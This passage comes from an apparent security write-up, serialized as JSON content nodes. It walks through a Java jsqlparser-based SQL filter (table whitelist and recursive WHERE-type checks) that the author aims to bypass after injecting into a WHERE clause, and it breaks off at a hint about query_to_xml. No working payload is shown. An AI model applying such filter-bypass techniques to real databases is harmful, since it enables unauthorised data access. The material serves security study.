",{"type":32,"tag":83,"props":1163,"children":1164},{"style":427},[1165],{"type":38,"value":1166},"var3",{"type":32,"tag":83,"props":1168,"children":1169},{"style":433},[1170],{"type":38,"value":869},{"type":32,"tag":83,"props":1172,"children":1173},{"style":433},[1174],{"type":38,"value":874},{"type":32,"tag":83,"props":1176,"children":1177},{"class":85,"line":204},[1178,1183,1187,1192],{"type":32,"tag":83,"props":1179,"children":1180},{"style":427},[1181],{"type":38,"value":1182},"    var3",{"type":32,"tag":83,"props":1184,"children":1185},{"style":433},[1186],{"type":38,"value":629},{"type":32,"tag":83,"props":1188,"children":1189},{"style":576},[1190],{"type":38,"value":1191},"printStackTrace",{"type":32,"tag":83,"props":1193,"children":1194},{"style":433},[1195],{"type":38,"value":918},{"type":32,"tag":83,"props":1197,"children":1198},{"class":85,"line":218},[1199,1204,1208,1213,1217,1221,1226,1230],{"type":32,"tag":83,"props":1200,"children":1201},{"style":90},[1202],{"type":38,"value":1203},"      throw",{"type":32,"tag":83,"props":1205,"children":1206},{"style":90},[1207],{"type":38,"value":908},{"type":32,"tag":83,"props":1209,"children":1210},{"style":576},[1211],{"type":38,"value":1212}," SQLException",{"type":32,"tag":83,"props":1214,"children":1215},{"style":433},[1216],{"type":38,"value":584},{"type":32,"tag":83,"props":1218,"children":1219},{"style":439},[1220],{"type":38,"value":452},{"type":32,"tag":83,"props":1222,"children":1223},{"style":338},[1224],{"type":38,"value":1225},"SQL error",{"type":32,"tag":83,"props":1227,"children":1228},{"style":439},[1229],{"type":38,"value":452},{"type":32,"tag":83,"props":1231,"children":1232},{"style":433},[1233],{"type":38,"value":1048},{"type":32,"tag":83,"props":1235,"children":1236},{"class":85,"line":230},[1237],{"type":32,"tag":83,"props":1238,"children":1239},{"style":433},[1240],{"type":38,"value":1241},"  }\n",{"type":32,"tag":83,"props":1243,"children":1244},{"class":85,"line":238},[1245],{"type":32,"tag":83,"props":1246,"children":1247},{"style":433},[1248],{"type":38,"value":1249},"}\n",{"type":32,"tag":47,"props":1251,"children":1252},{},[1253],{"type":38,"value":1254},"In our case, it will process the select part of the request, verify that it is indeed an instance of plainselect, then check the from part which will verify that this part contains a table name.",{"type":32,"tag":68,"props":1256,"children":1257},{"lang":407},[1258],{"type":32,"tag":73,"props":1259,"children":1261},{"code":1260,"language":407,"meta":7,"className":412,"style":7},"private static boolean processSelect(Select statement) {\n  SelectBody selectBody = statement.getSelectBody();\n  if (selectBody instanceof PlainSelect) {\n      PlainSelect plainSelect = (PlainSelect)selectBody;\n      FromItem fromItem = plainSelect.getFromItem();\n      if (fromItem instanceof Table) {\n        String tablename = ((Table)fromItem).getName();\n        List\u003CString> whiteTable = SQLCheck.getWhiteTable();\n\n        if (!whiteTable.contains(tablename)) {\n            return false;\n        }\n        BinaryExpression expression = (BinaryExpression)plainSelect.getWhere();\n\n        if (!restrictExpr(expression)) {\n            return false;\n        }\n        return true;\n      }\n  }\n  return false;\n}\n",[1262],{"type":32,"tag":79,"props":1263,"children":1264},{"__ignoreMap":7},[1265,1302,1336,1370,1409,1443,1476,1526,1575,1582,1631,1647,1655,1703,1710,1747,1762,1769,1785,1792,1799,1815],{"type":32,"tag":83,"props":1266,"children":1267},{"class":85,"line":86},[1268,1273,1277,1281,1285,1289,1294,1298],{"type":32,"tag":83,"props":1269,"children":1270},{"style":455},[1271],{"type":38,"value":1272},"private",{"type":32,"tag":83,"props":1274,"children":1275},{"style":455},[1276],{"type":38,"value":845},{"type":32,"tag":83,"props":1278,"children":1279},{"style":455},[1280],{"type":38,"value":850},{"type":32,"tag":83,"props":1282,"children":1283},{"style":576},[1284],{"type":38,"value":1024},{"type":32,"tag":83,"props":1286,"children":1287},{"style":433},[1288],{"type":38,"value":584},{"type":32,"tag":83,"props":1290,"children":1291},{"style":96},[1292],{"type":38,"value":1293},"Select statement",{"type":32,"tag":83,"props":1295,"children":1296},{"style":433},[1297],{"type":38,"value":869},{"type":32,"tag":83,"props":1299,"children":1300},{"style":433},[1301],{"type":38,"value":874},{"type":32,"tag":83,"props":1303,"children":1304},{"class":85,"line":102},[1305,1310,1315,1319,1323,1327,1332],{"type":32,"tag":83,"props":1306,"children":1307},{"style":96},[1308],{"type":38,"value":1309},"  SelectBody",{"type":32,"tag":83,"props":1311,"children":1312},{"style":427},[1313],{"type":38,"value":1314}," selectBody",{"type":32,"tag":83,"props":1316,"children":1317},{"style":433},[1318],{"type":38,"value":436},{"type":32,"tag":83,"props":1320,"children":1321},{"style":427},[1322],{"type":38,"value":931},{"type":32,"tag":83,"props":1324,"children":1325},{"style":433},[1326],{"type":38,"value":629},{"type":32,"tag":83,"props":1328,"children":1329},{"style":576},[1330],{"type":38,"value":1331},"getSelectBody",{"type":32,"tag":83,"props":1333,"children":1334},{"style":433},[1335],{"type":38,"value":918},{"type":32,"tag":83,"props":1337,"children":1338},{"class":85,"line":112},[1339,1344,1348,1353,1357,1362,1366],{"type":32,"tag":83,"props":1340,"children":1341},{"style":90},[1342],{"type":38,"value":1343},"  if",{"type":32,"tag":83,"props":1345,"children":1346},{"style":433},[1347],{"type":38,"value":988},{"type":32,"tag":83,"props":1349,"children":1350},{"style":96},[1351],{"type":38,"value":1352},"selectBody ",{"type":32,"tag":83,"props":1354,"children":1355},{"style":455},[1356],{"type":38,"value":998},{"type":32,"tag":83,"props":1358,"children":1359},{"style":96},[1360],{"type":38,"value":1361}," PlainSelect",{"type":32,"tag":83,"props":1363,"children":1364},{"style":433},[1365],{"type":38,"value":869},{"type":32,"tag":83,"props":1367,"children":1368},{"style":433},[1369],{"type":38,"value":874},{"type":32,"tag":83,"props":1371,"children":1372},{"class":85,"line":126},[1373,1378,1383,1387,1391,1396,1400,1405],{"type":32,"tag":83,"props":1374,"children":1375},{"style":96},[1376],{"type":38,"value":1377},"      PlainSelect",{"type":32,"tag":83,"props":1379,"children":1380},{"style":427},[1381],{"type":38,"value":1382}," plainSelect",{"type":32,"tag":83,"props":1384,"children":1385},{"style":433},[1386],{"type":38,"value":436},{"type":32,"tag":83,"props":1388,"children":1389},{"style":433},[1390],{"type":38,"value":988},{"type":32,"tag":83,"props":1392,"children":1393},{"style":96},[1394],{"type":38,"value":1395},"PlainSelect",{"type":32,"tag":83,"props":1397,"children":1398},{"style":433},[1399],{"type":38,"value":869},{"type":32,"tag":83,"props":1401,"children":1402},{"style":96},[1403],{"type":38,"value":1404},"selectBody",{"type":32,"tag":83,"props":1406,"children":1407},{"style":433},[1408],{"type":38,"value":486},{"type":32,"tag":83,"props":1410,"children":1411},{"class":85,"line":135},[1412,1417,1422,1426,1430,1434,1439],{"type":32,"tag":83,"props":1413,"children":1414},{"style":96},[1415],{"type":38,"value":1416},"      FromItem",{"type":32,"tag":83,"props":1418,"children":1419},{"style":427},[1420],{"type":38,"value":1421}," fromItem",{"type":32,"tag":83,"props":1423,"children":1424},{"style":433},[1425],{"type":38,"value":436},{"type":32,"tag":83,"props":1427,"children":1428},{"style":427},[1429],{"type":38,"value":1382},{"type":32,"tag":83,"props":1431,"children":1432},{"style":433},[1433],{"type":38,"value":629},{"type":32,"tag":83,"props":1435,"children":1436},{"style":576},[1437],{"type":38,"value":1438},"getFromItem",{"type":32,"tag":83,"props":1440,"children":1441},{"style":433},[1442],{"type":38,"value":918},{"type":32,"tag":83,"props":1444,"children":1445},{"class":85,"line":148},[1446,1450,1454,1459,1463,1468,1472],{"type":32,"tag":83,"props":1447,"children":1448},{"style":90},[1449],{"type":38,"value":983},{"type":32,"tag":83,"props":1451,"children":1452},{"style":433},[1453],{"type":38,"value":988},{"type":32,"tag":83,"props":1455,"children":1456},{"style":96},[1457],{"type":38,"value":1458},"fromItem ",{"type":32,"tag":83,"props":1460,"children":1461},{"style":455},[1462],{"type":38,"value":998},{"type":32,"tag":83,"props":1464,"children":1465},{"style":96},[1466],{"type":38,"value":1467}," Table",{"type":32,"tag":83,"props":1469,"children":1470},{"style":433},[1471],{"type":38,"value":869},{"type":32,"tag":83,"props":1473,"children":1474},{"style":433},[1475],{"type":38,"value":874},{"type":32,"tag":83,"props":1477,"children":1478},{"class":85,"line":161},[1479,1484,1489,1493,1498,1503,1507,1512,1517,1522],{"type":32,"tag":83,"props":1480,"children":1481},{"style":96},[1482],{"type":38,"value":1483},"        String",{"type":32,"tag":83,"props":1485,"children":1486},{"style":427},[1487],{"type":38,"value":1488}," tablename",{"type":32,"tag":83,"props":1490,"children":1491},{"style":433},[1492],{"type":38,"value":436},{"type":32,"tag":83,"props":1494,"children":1495},{"style":433},[1496],{"type":38,"value":1497}," ((",{"type":32,"tag":83,"props":1499,"children":1500},{"style":96},[1501],{"type":38,"value":1502},"Table",{"type":32,"tag":83,"props":1504,"children":1505},{"style":433},[1506],{"type":38,"value":869},{"type":32,"tag":83,"props":1508,"children":1509},{"style":96},[1510],{"type":38,"value":1511},"fromItem",{"type":32,"tag":83,"props":1513,"children":1514},{"style":433},[1515],{"type":38,"value":1516},").",{"type":32,"tag":83,"props":1518,"children":1519},{"style":576},[1520],{"type":38,"value":1521},"getName",{"type":32,"tag":83,"props":1523,"children":1524},{"style":433},[1525],{"type":38,"value":918},{"type":32,"tag":83,"props":1527,"children":1528},{"class":85,"line":169},[1529,1534,1539,1543,1548,1553,1557,1562,1566,1571],{"type":32,"tag":83,"props":1530,"children":1531},{"style":96},[1532],{"type":38,"value":1533},"        List",{"type":32,"tag":83,"props":1535,"children":1536},{"style":433},[1537],{"type":38,"value":1538},"\u003C",{"type":32,"tag":83,"props":1540,"children":1541},{"style":455},[1542],{"type":38,"value":424},{"type":32,"tag":83,"props":1544,"children":1545},{"style":433},[1546],{"type":38,"value":1547},">",{"type":32,"tag":83,"props":1549,"children":1550},{"style":427},[1551],{"type":38,"value":1552}," whiteTable",{"type":32,"tag":83,"props":1554,"children":1555},{"style":433},[1556],{"type":38,"value":436},{"type":32,"tag":83,"props":1558,"children":1559},{"style":427},[1560],{"type":38,"value":1561}," SQLCheck",{"type":32,"tag":83,"props":1563,"children":1564},{"style":433},[1565],{"type":38,"value":629},{"type":32,"tag":83,"props":1567,"children":1568},{"style":576},[1569],{"type":38,"value":1570},"getWhiteTable",{"type":32,"tag":83,"props":1572,"children":1573},{"style":433},[1574],{"type":38,"value":918},{"type":32,"tag":83,"props":1576,"children":1577},{"class":85,"line":183},[1578],{"type":32,"tag":83,"props":1579,"children":1580},{"emptyLinePlaceholder":106},[1581],{"type":38,"value":109},{"type":32,"tag":83,"props":1583,"children":1584},{"class":85,"line":196},[1585,1590,1594,1599,1604,1608,1613,1617,1622,1627],{"type":32,"tag":83,"props":1586,"children":1587},{"style":90},[1588],{"type":38,"value":1589},"        if",{"type":32,"tag":83,"props":1591,"children":1592},{"style":433},[1593],{"type":38,"value":988},{"type":32,"tag":83,"props":1595,"children":1596},{"style":455},[1597],{"type":38,"value":1598},"!",{"type":32,"tag":83,"props":1600,"children":1601},{"style":427},[1602],{"type":38,"value":1603},"whiteTable",{"type":32,"tag":83,"props":1605,"children":1606},{"style":433},[1607],{"type":38,"value":629},{"type":32,"tag":83,"props":1609,"children":1610},{"style":576},[1611],{"type":38,"value":1612},"contains",{"type":32,"tag":83,"props":1614,"children":1615},{"style":433},[1616],{"type":38,"value":584},{"type":32,"tag":83,"props":1618,"children":1619},{"style":96},[1620],{"type":38,"value":1621},"tablename",{"type":32,"tag":83,"props":1623,"children":1624},{"style":433},[1625],{"type":38,"value":1626},"))",{"type":32,"tag":83,"props":1628,"children":1629},{"style":433},[1630],{"type":38,"value":874},{"type":32,"tag":83,"props":1632,"children":1633},{"class":85,"line":204},[1634,1639,1643],{"type":32,"tag":83,"props":1635,"children":1636},{"style":90},[1637],{"type":38,"value":1638},"            return",{"type":32,"tag":83,"props":1640,"children":1641},{"style":90},[1642],{"type":38,"value":1127},{"type":32,"tag":83,"props":1644,"children":1645},{"style":433},[1646],{"type":38,"value":486},{"type":32,"tag":83,"props":1648,"children":1649},{"class":85,"line":218},[1650],{"type":32,"tag":83,"props":1651,"children":1652},{"style":433},[1653],{"type":38,"value":1654},"        }\n",{"type":32,"tag":83,"props":1656,"children":1657},{"class":85,"line":230},[1658,1663,1668,1672,1676,1681,1685,1690,1694,1699],{"type":32,"tag":83,"props":1659,"children":1660},{"style":96},[1661],{"type":38,"value":1662},"        BinaryExpression",{"type":32,"tag":83,"props":1664,"children":1665},{"style":427},[1666],{"type":38,"value":1667}," expression",{"type":32,"tag":83,"props":1669,"children":1670},{"style":433},[1671],{"type":38,"value":436},{"type":32,"tag":83,"props":1673,"children":1674},{"style":433},[1675],{"type":38,"value":988},{"type":32,"tag":83,"props":1677,"children":1678},{"style":96},[1679],{"type":38,"value":1680},"BinaryExpression",{"type":32,"tag":83,"props":1682,"children":1683},{"style":433},[1684],{"type":38,"value":869},{"type":32,"tag":83,"props":1686,"children":1687},{"style":427},[1688],{"type":38,"value":1689},"plainSelect",{"type":32,"tag":83,"props":1691,"children":1692},{"style":433},[1693],{"type":38,"value":629},{"type":32,"tag":83,"props":1695,"children":1696},{"style":576},[1697],{"type":38,"value":1698},"getWhere",{"type":32,"tag":83,"props":1700,"children":1701},{"style":433},[1702],{"type":38,"value":918},{"type":32,"tag":83,"props":1704,"children":1705},{"class":85,"line":238},[1706],{"type":32,"tag":83,"props":1707,"children":1708},{"emptyLinePlaceholder":106},[1709],{"type":38,"value":109},{"type":32,"tag":83,"props":1711,"children":1712},{"class":85,"line":251},[1713,1717,1721,1725,1730,1734,1739,1743],{"type":32,"tag":83,"props":1714,"children":1715},{"style":90},[1716],{"type":38,"value":1589},{"type":32,"tag":83,"props":1718,"children":1719},{"style":433},[1720],{"type":38,"value":988},{"type":32,"tag":83,"props":1722,"children":1723},{"style":455},[1724],{"type":38,"value":1598},{"type":32,"tag":83,"props":1726,"children":1727},{"style":576},[1728],{"type":38,"value":1729},"restrictExpr",{"type":32,"tag":83,"props":1731,"children":1732},{"style":433},[1733],{"type":38,"value":584},{"type":32,"tag":83,"props":1735,"children":1736},{"style":96},[1737],{"type":38,"value":1738},"expression",{"type":32,"tag":83,"props":1740,"children":1741},{"style":433},[1742],{"type":38,"value":1626},{"type":32,"tag":83,"props":1744,"children":1745},{"style":433},[1746],{"type":38,"value":874},{"type":32,"tag":83,"props":1748,"children":1749},{"class":85,"line":264},[1750,1754,1758],{"type":32,"tag":83,"props":1751,"children":1752},{"style":90},[1753],{"type":38,"value":1638},{"type":32,"tag":83,"props":1755,"children":1756},{"style":90},[1757],{"type":38,"value":1127},{"type":32,"tag":83,"props":1759,"children":1760},{"style":433},[1761],{"type":38,"value":486},{"type":32,"tag":83,"props":1763,"children":1764},{"class":85,"line":277},[1765],{"type":32,"tag":83,"props":1766,"children":1767},{"style":433},[1768],{"type":38,"value":1654},{"type":32,"tag":83,"props":1770,"children":1771},{"class":85,"line":285},[1772,1776,1781],{"type":32,"tag":83,"props":1773,"children":1774},{"style":90},[1775],{"type":38,"value":1019},{"type":32,"tag":83,"props":1777,"children":1778},{"style":90},[1779],{"type":38,"value":1780}," true",{"type":32,"tag":83,"props":1782,"children":1783},{"style":433},[1784],{"type":38,"value":486},{"type":32,"tag":83,"props":1786,"children":1787},{"class":85,"line":298},[1788],{"type":32,"tag":83,"props":1789,"children":1790},{"style":433},[1791],{"type":38,"value":1139},{"type":32,"tag":83,"props":1793,"children":1794},{"class":85,"line":311},[1795],{"type":32,"tag":83,"props":1796,"children":1797},{"style":433},[1798],{"type":38,"value":1241},{"type":32,"tag":83,"props":1800,"children":1801},{"class":85,"line":324},[1802,1807,1811],{"type":32,"tag":83,"props":1803,"children":1804},{"style":90},[1805],{"type":38,"value":1806},"  return",{"type":32,"tag":83,"props":1808,"children":1809},{"style":90},[1810],{"type":38,"value":1127},{"type":32,"tag":83,"props":1812,"children":1813},{"style":433},[1814],{"type":38,"value":486},{"type":32,"tag":83,"props":1816,"children":1818},{"class":85,"line":1817},22,[1819],{"type":32,"tag":83,"props":1820,"children":1821},{"style":433},[1822],{"type":38,"value":1249},{"type":32,"tag":47,"props":1824,"children":1825},{},[1826,1828,1833,1835,1841,1843,1848],{"type":38,"value":1827},"Next, the function will check the last part, namely, the where part of the query. For this, it will retrieve the entirety of the where with the ",{"type":32,"tag":79,"props":1829,"children":1831},{"className":1830},[],[1832],{"type":38,"value":1698},{"type":38,"value":1834}," function from the library ",{"type":32,"tag":79,"props":1836,"children":1838},{"className":1837},[],[1839],{"type":38,"value":1840},"net.sf.jsqlparser.expression",{"type":38,"value":1842}," and call the function ",{"type":32,"tag":79,"props":1844,"children":1846},{"className":1845},[],[1847],{"type":38,"value":1729},{"type":38,"value":629},{"type":32,"tag":47,"props":1850,"children":1851},{},[1852],{"type":38,"value":1853},"The firsts three checks are not of interest to us because they are okay in our case given that we have not altered these parts of the query.",{"type":32,"tag":47,"props":1855,"children":1856},{},[1857,1859,1864],{"type":38,"value":1858},"Here since we injected into the where, it is the filter on this one that must be bypassed. If we look closely at the ",{"type":32,"tag":79,"props":1860,"children":1862},{"className":1861},[],[1863],{"type":38,"value":1729},{"type":38,"value":1865}," function. We can see that this recursive function retrieves the right part and the left part of the where part of the query.",{"type":32,"tag":68,"props":1867,"children":1868},{"lang":407},[1869],{"type":32,"tag":73,"props":1870,"children":1872},{"code":1871,"language":407,"meta":7,"className":412,"style":7},"private static boolean restrictExpr(BinaryExpression expression) {\n  Expression left_expr = expression.getLeftExpression();\n  Expression right_expr = expression.getRightExpression();\n  if (left_expr instanceof BinaryExpression) {\n      return restrictExpr((BinaryExpression)left_expr);\n  } else if (right_expr instanceof BinaryExpression) {\n      return restrictExpr((BinaryExpression)right_expr);\n  } else {\n      List arrays = Arrays.asList(restrictExprCls);         \n      return arrays.contains(left_expr.getClass()) && arrays.contains(right_expr.getClass());\n  }\n}\n",[1873],{"type":32,"tag":79,"props":1874,"children":1875},{"__ignoreMap":7},[1876,1913,1947,1980,2013,2046,2087,2119,2134,2184,2263,2270],{"type":32,"tag":83,"props":1877,"children":1878},{"class":85,"line":86},[1879,1883,1887,1891,1896,1900,1905,1909],{"type":32,"tag":83,"props":1880,"children":1881},{"style":455},[1882],{"type":38,"value":1272},{"type":32,"tag":83,"props":1884,"children":1885},{"style":455},[1886],{"type":38,"value":845},{"type":32,"tag":83,"props":1888,"children":1889},{"style":455},[1890],{"type":38,"value":850},{"type":32,"tag":83,"props":1892,"children":1893},{"style":576},[1894],{"type":38,"value":1895}," restrictExpr",{"type":32,"tag":83,"props":1897,"children":1898},{"style":433},[1899],{"type":38,"value":584},{"type":32,"tag":83,"props":1901,"children":1902},{"style":96},[1903],{"type":38,"value":1904},"BinaryExpression expression",{"type":32,"tag":83,"props":1906,"children":1907},{"style":433},[1908],{"type":38,"value":869},{"type":32,"tag":83,"props":1910,"children":1911},{"style":433},[1912],{"type":38,"value":874},{"type":32,"tag":83,"props":1914,"children":1915},{"class":85,"line":102},[1916,1921,1926,1930,1934,1938,1943],{"type":32,"tag":83,"props":1917,"children":1918},{"style":96},[1919],{"type":38,"value":1920},"  Expression",{"type":32,"tag":83,"props":1922,"children":1923},{"style":427},[1924],{"type":38,"value":1925}," left_expr",{"type":32,"tag":83,"props":1927,"children":1928},{"style":433},[1929],{"type":38,"value":436},{"type":32,"tag":83,"props":1931,"children":1932},{"style":427},[1933],{"type":38,"value":1667},{"type":32,"tag":83,"props":1935,"children":1936},{"style":433},[1937],{"type":38,"value":629},{"type":32,"tag":83,"props":1939,"children":1940},{"style":576},[1941],{"type":38,"value":1942},"getLeftExpression",{"type":32,"tag":83,"props":1944,"children":1945},{"style":433},[1946],{"type":38,"value":918},{"type":32,"tag":83,"props":1948,"children":1949},{"class":85,"line":112},[1950,1954,1959,1963,1967,1971,1976],{"type":32,"tag":83,"props":1951,"children":1952},{"style":96},[1953],{"type":38,"value":1920},{"type":32,"tag":83,"props":1955,"children":1956},{"style":427},[1957],{"type":38,"value":1958}," right_expr",{"type":32,"tag":83,"props":1960,"children":1961},{"style":433},[1962],{"type":38,"value":436},{"type":32,"tag":83,"props":1964,"children":1965},{"style":427},[1966],{"type":38,"value":1667},{"type":32,"tag":83,"props":1968,"children":1969},{"style":433},[1970],{"type":38,"value":629},{"type":32,"tag":83,"props":1972,"children":1973},{"style":576},[1974],{"type":38,"value":1975},"getRightExpression",{"type":32,"tag":83,"props":1977,"children":1978},{"style":433},[1979],{"type":38,"value":918},{"type":32,"tag":83,"props":1981,"children":1982},{"class":85,"line":126},[1983,1987,1991,1996,2000,2005,2009],{"type":32,"tag":83,"props":1984,"children":1985},{"style":90},[1986],{"type":38,"value":1343},{"type":32,"tag":83,"props":1988,"children":1989},{"style":433},[1990],{"type":38,"value":988},{"type":32,"tag":83,"props":1992,"children":1993},{"style":96},[1994],{"type":38,"value":1995},"left_expr ",{"type":32,"tag":83,"props":1997,"children":1998},{"style":455},[1999],{"type":38,"value":998},{"type":32,"tag":83,"props":2001,"children":2002},{"style":96},[2003],{"type":38,"value":2004}," BinaryExpression",{"type":32,"tag":83,"props":2006,"children":2007},{"style":433},[2008],{"type":38,"value":869},{"type":32,"tag":83,"props":2010,"children":2011},{"style":433},[2012],{"type":38,"value":874},{"type":32,"tag":83,"props":2014,"children":2015},{"class":85,"line":135},[2016,2021,2025,2029,2033,2037,2042],{"type":32,"tag":83,"props":2017,"children":2018},{"style":90},[2019],{"type":38,"value":2020},"      return",{"type":32,"tag":83,"props":2022,"children":2023},{"style":576},[2024],{"type":38,"value":1895},{"type":32,"tag":83,"props":2026,"children":2027},{"style":433},[2028],{"type":38,"value":1029},{"type":32,"tag":83,"props":2030,"children":2031},{"style":96},[2032],{"type":38,"value":1680},{"type":32,"tag":83,"props":2034,"children":2035},{"style":433},[2036],{"type":38,"value":869},{"type":32,"tag":83,"props":2038,"children":2039},{"style":96},[2040],{"type":38,"value":2041},"left_expr",{"type":32,"tag":83,"props":2043,"children":2044},{"style":433},[2045],{"type":38,"value":1048},{"type":32,"tag":83,"props":2047,"children":2048},{"class":85,"line":148},[2049,2053,2057,2062,2066,2071,2075,2079,2083],{"type":32,"tag":83,"props":2050,"children":2051},{"style":433},[2052],{"type":38,"value":1147},{"type":32,"tag":83,"props":2054,"children":2055},{"style":90},[2056],{"type":38,"value":1061},{"type":32,"tag":83,"props":2058,"children":2059},{"style":90},[2060],{"type":38,"value":2061}," if",{"type":32,"tag":83,"props":2063,"children":2064},{"style":433},[2065],{"type":38,"value":988},{"type":32,"tag":83,"props":2067,"children":2068},{"style":96},[2069],{"type":38,"value":2070},"right_expr ",{"type":32,"tag":83,"props":2072,"children":2073},{"style":455},[2074],{"type":38,"value":998},{"type":32,"tag":83,"props":2076,"children":2077},{"style":96},[2078],{"type":38,"value":2004},{"type":32,"tag":83,"props":2080,"children":2081},{"style":433},[2082],{"type":38,"value":869},{"type":32,"tag":83,"props":2084,"children":2085},{"style":433},[2086],{"type":38,"value":874},{"type":32,"tag":83,"props":2088,"children":2089},{"class":85,"line":161},[2090,2094,2098,2102,2106,2110,2115],{"type":32,"tag":83,"props":2091,"children":2092},{"style":90},[2093],{"type":38,"value":2020},{"type":32,"tag":83,"props":2095,"children":2096},{"style":576},[2097],{"type":38,"value":1895},{"type":32,"tag":83,"props":2099,"children":2100},{"style":433},[2101],{"type":38,"value":1029},{"type":32,"tag":83,"props":2103,"children":2104},{"style":96},[2105],{"type":38,"value":1680},{"type":32,"tag":83,"props":2107,"children":2108},{"style":433},[2109],{"type":38,"value":869},{"type":32,"tag":83,"props":2111,"children":2112},{"style":96},[2113],{"type":38,"value":2114},"right_expr",{"type":32,"tag":83,"props":2116,"children":2117},{"style":433},[2118],{"type":38,"value":1048},{"type":32,"tag":83,"props":2120,"children":2121},{"class":85,"line":169},[2122,2126,2130],{"type":32,"tag":83,"props":2123,"children":2124},{"style":433},[2125],{"type":38,"value":1147},{"type":32,"tag":83,"props":2127,"children":2128},{"style":90},[2129],{"type":38,"value":1061},{"type":32,"tag":83,"props":2131,"children":2132},{"style":433},[2133],{"type":38,"value":874},{"type":32,"tag":83,"props":2135,"children":2136},{"class":85,"line":183},[2137,2142,2147,2151,2156,2160,2165,2169,2174,2179],{"type":32,"tag":83,"props":2138,"children":2139},{"style":96},[2140],{"type":38,"value":2141},"      List",{"type":32,"tag":83,"props":2143,"children":2144},{"style":427},[2145],{"type":38,"value":2146}," arrays",{"type":32,"tag":83,"props":2148,"children":2149},{"style":433},[2150],{"type":38,"value":436},{"type":32,"tag":83,"props":2152,"children":2153},{"style":427},[2154],{"type":38,"value":2155}," Arrays",{"type":32,"tag":83,"props":2157,"children":2158},{"style":433},[2159],{"type":38,"value":629},{"type":32,"tag":83,"props":2161,"children":2162},{"style":576},[2163],{"type":38,"value":2164},"asList",{"type":32,"tag":83,"props":2166,"children":2167},{"style":433},[2168],{"type":38,"value":584},{"type":32,"tag":83,"props":2170,"children":2171},{"style":96},[2172],{"type":38,"value":2173},"restrictExprCls",{"type":32,"tag":83,"props":2175,"children":2176},{"style":433},[2177],{"type":38,"value":2178},");",{"type":32,"tag":83,"props":2180,"children":2181},{"style":96},[2182],{"type":38,"value":2183},"         \n",{"type":32,"tag":83,"props":2185,"children":2186},{"class":85,"line":196},[2187,2191,2195,2199,2203,2207,2211,2215,2220,2225,2230,2234,2238,2242,2246,2250,2254,2258],{"type":32,"tag":83,"props":2188,"children":2189},{"style":90},[2190],{"type":38,"value":2020},{"type":32,"tag":83,"props":2192,"children":2193},{"style":427},[2194],{"type":38,"value":2146},{"type":32,"tag":83,"props":2196,"children":2197},{"style":433},[2198],{"type":38,"value":629},{"type":32,"tag":83,"props":2200,"children":2201},{"style":576},[2202],{"type":38,"value":1612},{"type":32,"tag":83,"props":2204,"children":2205},{"style":433},[2206],{"type":38,"value":584},{"type":32,"tag":83,"props":2208,"children":2209},{"style":427},[2210],{"type":38,"value":2041},{"type":32,"tag":83,"props":2212,"children":2213},{"style":433},[2214],{"type":38,"value":629},{"type":32,"tag":83,"props":2216,"children":2217},{"style":576},[2218],{"type":38,"value":2219},"getClass",{"type":32,"tag":83,"props":2221,"children":2222},{"style":433},[2223],{"type":38,"value":2224},"())",{"type":32,"tag":83,"props":2226,"children":2227},{"style":455},[2228],{"type":38,"value":2229}," &&",{"type":32,"tag":83,"props":2231,"children":2232},{"style":427},[2233],{"type":38,"value":2146},{"type":32,"tag":83,"props":2235,"children":2236},{"style":433},[2237],{"type":38,"value":629},{"type":32,"tag":83,"props":2239,"children":2240},{"style":576},[2241],{"type":38,"value":1612},{"type":32,"tag":83,"props":2243,"children":2244},{"style":433},[2245],{"type":38,"value":584},{"type":32,"tag":83,"props":2247,"children":2248},{"style":427},[2249],{"type":38,"value":2114},{"type":32,"tag":83,"props":2251,"children":2252},{"style":433},[2253],{"type":38,"value":629},{"type":32,"tag":83,"props":2255,"children":2256},{"style":576},[2257],{"type":38,"value":2219},{"type":32,"tag":83,"props":2259,"children":2260},{"style":433},[2261],{"type":38,"value":2262},"());\n",{"type":32,"tag":83,"props":2264,"children":2265},{"class":85,"line":204},[2266],{"type":32,"tag":83,"props":2267,"children":2268},{"style":433},[2269],{"type":38,"value":1241},{"type":32,"tag":83,"props":2271,"children":2272},{"class":85,"line":218},[2273],{"type":32,"tag":83,"props":2274,"children":2275},{"style":433},[2276],{"type":38,"value":1249},{"type":32,"tag":47,"props":2278,"children":2279},{},[2280],{"type":38,"value":2281},"If one of the parts contains another part of where then the function will be reapplied. At the end of the recursion, if one of the two parts does not respect the whitelisted types then the query is not accepted.",{"type":32,"tag":47,"props":2283,"children":2284},{},[2285],{"type":38,"value":2286},"The whitelisted types are:",{"type":32,"tag":68,"props":2288,"children":2289},{"lang":515},[2290],{"type":32,"tag":73,"props":2291,"children":2294},{"code":2292,"language":515,"meta":7,"className":2293,"style":7},"LongValue\nStringValue\nNullValue\nTimeValue\nTimestampValue\nDateValue\nDoubleValue\nColumn\n","language-txt shiki shiki-themes vitesse-dark",[2295],{"type":32,"tag":79,"props":2296,"children":2297},{"__ignoreMap":7},[2298,2306,2314,2322,2330,2338,2346,2354],{"type":32,"tag":83,"props":2299,"children":2300},{"class":85,"line":86},[2301],{"type":32,"tag":83,"props":2302,"children":2303},{},[2304],{"type":38,"value":2305},"LongValue\n",{"type":32,"tag":83,"props":2307,"children":2308},{"class":85,"line":102},[2309],{"type":32,"tag":83,"props":2310,"children":2311},{},[2312],{"type":38,"value":2313},"StringValue\n",{"type":32,"tag":83,"props":2315,"children":2316},{"class":85,"line":112},[2317],{"type":32,"tag":83,"props":2318,"children":2319},{},[2320],{"type":38,"value":2321},"NullValue\n",{"type":32,"tag":83,"props":2323,"children":2324},{"class":85,"line":126},[2325],{"type":32,"tag":83,"props":2326,"children":2327},{},[2328],{"type":38,"value":2329},"TimeValue\n",{"type":32,"tag":83,"props":2331,"children":2332},{"class":85,"line":135},[2333],{"type":32,"tag":83,"props":2334,"children":2335},{},[2336],{"type":38,"value":2337},"TimestampValue\n",{"type":32,"tag":83,"props":2339,"children":2340},{"class":85,"line":148},[2341],{"type":32,"tag":83,"props":2342,"children":2343},{},[2344],{"type":38,"value":2345},"DateValue\n",{"type":32,"tag":83,"props":2347,"children":2348},{"class":85,"line":161},[2349],{"type":32,"tag":83,"props":2350,"children":2351},{},[2352],{"type":38,"value":2353},"DoubleValue\n",{"type":32,"tag":83,"props":2355,"children":2356},{"class":85,"line":169},[2357],{"type":32,"tag":83,"props":2358,"children":2359},{},[2360],{"type":38,"value":2361},"Column\n",{"type":32,"tag":47,"props":2363,"children":2364},{},[2365,2367,2373,2375,2381],{"type":38,"value":2366},"Spoiler, the function ",{"type":32,"tag":79,"props":2368,"children":2370},{"className":2369},[],[2371],{"type":38,"value":2372},"query_to_xml",{"type":38,"value":2374}," returns a 